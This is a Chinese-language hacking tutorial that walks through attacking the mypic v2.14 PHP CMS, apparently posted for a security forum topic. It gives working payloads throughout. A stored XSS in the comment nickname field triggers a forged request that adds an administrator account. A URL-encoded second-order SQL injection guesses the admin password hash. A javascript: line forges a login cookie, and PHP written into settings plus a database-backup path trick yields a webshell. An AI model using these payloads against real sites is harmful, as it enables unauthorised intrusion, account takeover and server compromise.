[php入侵3]mypic v2.14入侵教程

大家好，我是Only，今天在这是第一次做教程，不足之处还请见

谅。



本次的议题是mypic 2.14版本，啊，是个CMS系统，PHP写的，而

且大部分是用类写的。
对类不熟悉的朋友请查阅相关资料，这里就不做讲解了。文中函

数涉及较多，程序流程就不一一说明。
这就是我已经配置好的网站，一步步演示给大家看怎么入侵。


一、寻找注入漏洞

大致看了一下该网站，后台类基本在初始化时都用上了$this-

>user->check()，检查用户是否登录。
再看看黑防搭建的环境，前台只有“评论”功能，没开“投稿”

，貌似也没有前台上传的漏洞。
所以我们要么添加一个管理员，要么我们得到管理员的登录信息

。

漏洞产生根源：


论坛内风谷已经讲方法发布出来了。黑防会员可以看这里

http://www.hacker.com.cn/forum/view_128696.html
我一开始做议题也是找到这个单引号漏洞（ getquery()函数 ）

，发现可以直接利用。
该函数直接获取$_SERVER['QUERY_STRING']的值生成$_GET函数

。
而我们知道，本系统只对GPC三组函数进行了addslashes()处理

，未处理$_SERVER变量。
漏洞产生。。。


1.添加管理员

新闻评论的“昵称”部分未进行过滤（ comment()函数 ），直

接写入数据库，导致xss的产生。
分析后台用户添加的页面，可构造出如下语句添加一个用户名密

码为hackuser的管理员用户：
http://localhost:8080/mypic_2.14/admin.php?

m=user&a=add&data[name]=hackuser&data[pwd]

=hackuser&data[group_id]=999&useradd_sub=true

利用ajax技术，可以构造提交。具体写法大家可以看看以前的议

题。

当管理员登陆后查看留言记录时，我们就成功添加用户了。我们

在这里直接提交链接。


2.得到管理员登陆信息

但后来泉哥提示我们是讨论二次注射，刚考完试的我才开始努力

地看啊看。。终于，让我找到了（ show() ）！
我们知道，对字符进行escape处理，

http://www.xxx.com/index.php?id=1%27 and 1=1

这里$key变量进行了一次urldecode。而gpc对%是不转义的。
如果我们提交%27，即单引号的urlencode值，那么我们构造的语

句，不就变成了能正常执行的SQL语句了吗？
二次注射漏洞产生。。。

猜解语句：
http://localhost:8080/mypic_2.14/?album-show-key-sa%

27and%20(select%20id%20from%20mp_user%20where%20name%

20=%27admin%27%20and%20pwd%20like%20%2709%%27)>0%20and%

20'%'='.html



二、实现登陆后台

这部分比较烦，可采用构造cookie的方法实现。其实如果没有泉

大提供我们sys_hash，我们就算爆出pwd值也是没用的。
在不知道目标网站sys_hash的情况下，我们只能考虑用第一种方

法来进行入侵了。

实现方法：本机登陆后显示cookie，再将算出cookie的几个函数

拷出稍作修改，加上得到的pwd hash值，生成登陆cookie！
XXXXXXXX为生成后的值。等于号单独处理。在IE地址栏中执行：
javascript:alert(document.cookie="MP_BAR[mp_user]

=admin%"+"09XXXXXXXX"+escape("="));


三、拿WebShell

随便在哪个设置的地方写上php语句，保存设置后，直接跨路径

备份数据库即可。数据库备份这个功能果然很邪恶啊。。。






urlencode/urldecode online:
http://blog.nahoya.com/archives/2006_04/108

magic-quotes-gpc intro:
http://us3.php.net/manual/en/info.configuration.php#ini.

magic-quotes-gpc


javascript:alert(document.cookie);